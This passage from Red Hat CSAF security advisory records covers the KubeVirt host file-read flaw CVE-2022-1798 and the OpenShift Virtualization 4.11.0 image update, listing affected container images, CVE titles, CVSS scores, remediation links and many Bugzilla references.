"8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-22T08:16:30+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6681", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, ], }
rhsa-2022:6526
Vulnerability from csaf_redhat
Published
2022-09-14 19:28
Modified
2025-05-02 16:09
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
This advisory contains the following OpenShift Virtualization 4.11.0 images:
RHEL-8-CNV-4.11
===============
hostpath-provisioner-container-v4.11.0-21
kubevirt-tekton-tasks-operator-container-v4.11.0-29
kubevirt-template-validator-container-v4.11.0-17
bridge-marker-container-v4.11.0-26
hostpath-csi-driver-container-v4.11.0-21
cluster-network-addons-operator-container-v4.11.0-26
ovs-cni-marker-container-v4.11.0-26
virtio-win-container-v4.11.0-16
ovs-cni-plugin-container-v4.11.0-26
kubemacpool-container-v4.11.0-26
hostpath-provisioner-operator-container-v4.11.0-24
cnv-containernetworking-plugins-container-v4.11.0-26
kubevirt-ssp-operator-container-v4.11.0-54
virt-cdi-uploadserver-container-v4.11.0-59
virt-cdi-cloner-container-v4.11.0-59
virt-cdi-operator-container-v4.11.0-59
virt-cdi-importer-container-v4.11.0-59
virt-cdi-uploadproxy-container-v4.11.0-59
virt-cdi-controller-container-v4.11.0-59
virt-cdi-apiserver-container-v4.11.0-59
kubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7
kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7
kubevirt-tekton-tasks-copy-template-container-v4.11.0-7
checkup-framework-container-v4.11.0-67
kubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7
kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7
vm-network-latency-checkup-container-v4.11.0-67
kubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7
hyperconverged-cluster-webhook-container-v4.11.0-95
cnv-must-gather-container-v4.11.0-62
hyperconverged-cluster-operator-container-v4.11.0-95
kubevirt-console-plugin-container-v4.11.0-83
virt-controller-container-v4.11.0-105
virt-handler-container-v4.11.0-105
virt-operator-container-v4.11.0-105
virt-launcher-container-v4.11.0-105
virt-artifacts-server-container-v4.11.0-105
virt-api-container-v4.11.0-105
libguestfs-tools-container-v4.11.0-105
hco-bundle-registry-container-v4.11.0-587
Security Fix(es):
* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)
* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)
* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)
* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.11.0 images:\n\nRHEL-8-CNV-4.11\n===============\nhostpath-provisioner-container-v4.11.0-21\nkubevirt-tekton-tasks-operator-container-v4.11.0-29\nkubevirt-template-validator-container-v4.11.0-17\nbridge-marker-container-v4.11.0-26\nhostpath-csi-driver-container-v4.11.0-21\ncluster-network-addons-operator-container-v4.11.0-26\novs-cni-marker-container-v4.11.0-26\nvirtio-win-container-v4.11.0-16\novs-cni-plugin-container-v4.11.0-26\nkubemacpool-container-v4.11.0-26\nhostpath-provisioner-operator-container-v4.11.0-24\ncnv-containernetworking-plugins-container-v4.11.0-26\nkubevirt-ssp-operator-container-v4.11.0-54\nvirt-cdi-uploadserver-container-v4.11.0-59\nvirt-cdi-cloner-container-v4.11.0-59\nvirt-cdi-operator-container-v4.11.0-59\nvirt-cdi-importer-container-v4.11.0-59\nvirt-cdi-uploadproxy-container-v4.11.0-59\nvirt-cdi-controller-container-v4.11.0-59\nvirt-cdi-apiserver-container-v4.11.0-59\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.0-7\ncheckup-framework-container-v4.11.0-67\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7\nvm-network-latency-checkup-container-v4.11.0-67\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7\nhyperconverged-cluster-webhook-container-v4.11.0-95\ncnv-must-gather-container-v4.11.0-62\nhyperconverged-cluster-operator-container-v4.11.0-95\nkubevirt-console-plugin-container-v4.11.0-83\nvirt-controller-container-v4.11.0-105\nvirt-handler-container-v4.11.0-105\nvirt-operator-container-v4.11.0-105\nvirt-launcher-container-v4.11.0-105\nvirt-artifacts-server-container-v4.11.0-105\nvirt-api-container-v4.11.0-105\nlibguestfs-tools-container-v4.11.0-105\nhco-bundle-registry-container-v4.11.0-587\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)\n\n* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)\n\n* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)\n\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n\n* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6526", url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "1937609", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1937609", }, { category: "external", summary: "1945593", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1945593", }, { category: "external", summary: "1968514", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1968514", }, { category: "external", summary: "1993109", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1993109", }, { category: "external", summary: "1994604", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1994604", }, { category: "external", summary: "2001385", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2001385", }, { category: "external", summary: "2009793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2009793", }, { category: "external", summary: "2010318", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2010318", }, { category: "external", summary: "2025276", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2025276", }, { category: "external", summary: "2025401", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2025401", }, { category: "external", summary: "2026357", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2026357", }, { category: "external", summary: "2029349", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2029349", }, { category: "external", summary: "2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "2031857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2031857", }, { category: "external", summary: "2033077", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2033077", }, { category: "external", summary: "2035344", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2035344", }, { category: "external", summary: "2036676", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2036676", }, { category: "external", summary: "2039976", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2039976", }, { category: "external", summary: "2040766", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2040766", }, { category: "external", summary: "2041467", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2041467", }, { category: "external", summary: "2042402", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2042402", }, { category: "external", summary: "2042809", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2042809", }, { category: "external", summary: "2045086", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045086", }, { category: "external", summary: "2045880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { category: "external", summary: "2047186", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2047186", }, { category: "external", summary: "2051899", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2051899", }, { category: "external", summary: "2052094", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052094", }, { category: "external", summary: "2052466", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052466", }, { category: "external", summary: "2052689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052689", }, { category: "external", summary: "2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "2056467", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2056467", }, { category: "external", summary: "2057157", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2057157", }, { category: "external", summary: "2057310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2057310", }, { category: "external", summary: "2058149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2058149", }, { category: "external", summary: "2058925", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2058925", }, { category: "external", summary: "2059121", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2059121", }, { category: "external", summary: "2060485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060485", }, { category: "external", summary: "2060585", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060585", }, { category: "external", summary: "2061208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2061208", }, { category: "external", summary: "2061723", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2061723", }, { category: "external", summary: "2063540", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2063540", }, { category: "external", summary: "2063792", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2063792", }, { category: "external", summary: "2064034", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064034", }, { category: "external", summary: "2064702", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064702", }, { category: "external", summary: "2064857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064857", }, { category: "external", summary: "2064936", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064936", }, { category: "external", summary: "2065014", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2065014", }, { category: "external", summary: "2065019", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2065019", }, { category: "external", summary: "2066768", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2066768", }, { category: "external", summary: "2067246", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2067246", }, { category: "external", summary: "2069287", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069287", }, { category: "external", summary: "2069388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069388", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2070864", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070864", }, { category: "external", summary: "2071488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071488", }, { category: "external", summary: "2071549", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071549", }, { category: "external", summary: "2071611", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071611", }, { category: "external", summary: "2071921", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071921", }, { category: "external", summary: "2073669", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073669", }, { category: "external", summary: "2073679", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073679", }, { category: "external", summary: "2073982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073982", }, { category: "external", summary: "2074337", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2074337", }, { category: "external", summary: "2075200", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2075200", }, { category: "external", summary: "2075409", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2075409", }, { category: "external", summary: "2076292", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076292", }, { category: "external", summary: "2076379", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076379", }, { category: "external", summary: "2076790", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076790", }, { category: "external", summary: "2076908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076908", }, { category: "external", summary: "2077688", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077688", }, { category: "external", summary: "2077689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077689", }, { category: "external", summary: "2078700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078700", }, { category: "external", summary: "2078703", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078703", }, { category: "external", summary: "2078709", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078709", }, { category: "external", summary: "2078728", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078728", }, { category: "external", summary: "2079366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079366", }, { category: "external", summary: "2079674", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079674", }, { category: "external", summary: "2079783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079783", }, { category: "external", summary: "2080132", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080132", }, { category: "external", summary: "2080155", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080155", }, { category: "external", summary: "2080547", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080547", }, { category: "external", summary: "2080833", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080833", }, { category: "external", summary: "2080835", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080835", }, { category: "external", summary: "2081182", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081182", }, { category: "external", summary: "2081202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081202", }, { category: "external", summary: "2081409", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081409", }, { category: "external", summary: "2081671", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081671", }, { category: "external", summary: "2081831", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081831", }, { category: "external", summary: "2082008", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082008", }, { category: "external", summary: "2082164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082164", }, { category: "external", summary: "2082912", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082912", }, { category: "external", summary: "2083093", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083093", }, { category: "external", summary: "2083097", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083097", }, { category: "external", summary: "2083100", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083100", }, { category: "external", summary: "2083101", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083101", }, { category: "external", summary: "2083135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083135", }, { category: "external", summary: "2083256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083256", }, { category: "external", summary: "2083595", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083595", }, { category: "external", summary: "2084102", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084102", }, { category: "external", summary: "2084122", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084122", }, { category: "external", summary: "2084418", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084418", }, { category: "external", summary: "2084431", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084431", }, { category: "external", summary: "2084476", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084476", }, { category: "external", summary: "2084532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084532", }, { category: "external", summary: "2084610", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084610", }, { category: "external", summary: "2085320", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2085320", }, { category: "external", summary: "2085322", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2085322", }, { category: "external", summary: "2086272", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086272", }, { category: "external", summary: "2086278", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086278", }, { category: "external", summary: "2086281", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086281", }, { category: "external", summary: "2086286", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086286", }, { category: "external", summary: "2086293", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086293", }, { category: "external", summary: "2086294", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086294", }, { category: "external", summary: "2086303", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086303", }, { category: "external", summary: "2086479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086479", }, { category: "external", summary: "2086486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086486", }, { category: "external", summary: "2086488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086488", }, { category: "external", summary: "2086769", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086769", }, { category: "external", summary: "2086803", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086803", }, { category: "external", summary: "2086825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086825", }, { category: "external", summary: "2086849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086849", }, { category: "external", summary: "2087188", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087188", }, { category: "external", summary: "2087189", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087189", }, { category: "external", summary: "2087232", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087232", }, { category: "external", summary: "2087546", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087546", }, { category: "external", summary: "2087547", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087547", }, { category: "external", summary: "2087559", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087559", }, { category: "external", summary: "2087566", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087566", }, { category: "external", summary: "2087570", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087570", }, { category: "external", summary: "2087577", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087577", }, { category: "external", summary: "2087578", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087578", }, { category: "external", summary: "2087582", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087582", }, { category: "external", summary: "2087583", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087583", }, { category: "external", summary: "2087584", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087584", }, { category: "external", summary: "2087587", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087587", }, { category: "external", summary: "2087589", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087589", }, { category: "external", summary: "2087590", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087590", }, { category: "external", summary: "2087593", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087593", }, { category: "external", summary: "2087603", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087603", }, { category: "external", summary: "2087616", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087616", }, { category: "external", summary: "2087701", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087701", }, { category: "external", summary: "2087717", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087717", }, { category: "external", summary: "2088034", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088034", }, { category: "external", summary: "2088355", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088355", }, { category: "external", summary: "2088361", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088361", }, { category: "external", summary: "2088379", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088379", }, { category: "external", summary: "2088407", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088407", }, { category: "external", summary: "2088471", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088471", }, { category: "external", summary: "2088472", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088472", }, { category: "external", summary: "2088477", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088477", }, { category: "external", summary: "2088849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088849", }, { category: "external", summary: "2089078", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089078", }, { category: "external", summary: "2089271", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089271", }, { category: "external", summary: "2089327", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089327", }, { category: "external", summary: "2089376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089376", }, { category: "external", summary: "2089477", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089477", }, { category: "external", summary: "2089700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089700", }, { category: "external", summary: "2089745", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089745", }, { category: "external", summary: "2089789", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089789", }, { category: "external", summary: "2089825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089825", }, { category: "external", summary: "2089836", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089836", }, { category: "external", summary: "2089840", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089840", }, { category: "external", summary: "2089877", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089877", }, { category: "external", summary: "2089932", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089932", }, { category: "external", summary: "2089942", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089942", }, { category: "external", summary: "2089954", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089954", }, { category: "external", summary: "2089963", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089963", }, { category: "external", summary: "2089967", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089967", }, { category: "external", summary: "2089970", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089970", }, { category: "external", summary: "2089972", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089972", }, { category: "external", summary: "2089979", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089979", }, { category: "external", summary: "2089982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089982", }, { category: "external", summary: "2090035", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090035", }, { category: "external", summary: "2090036", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090036", }, { category: "external", summary: "2090037", url: 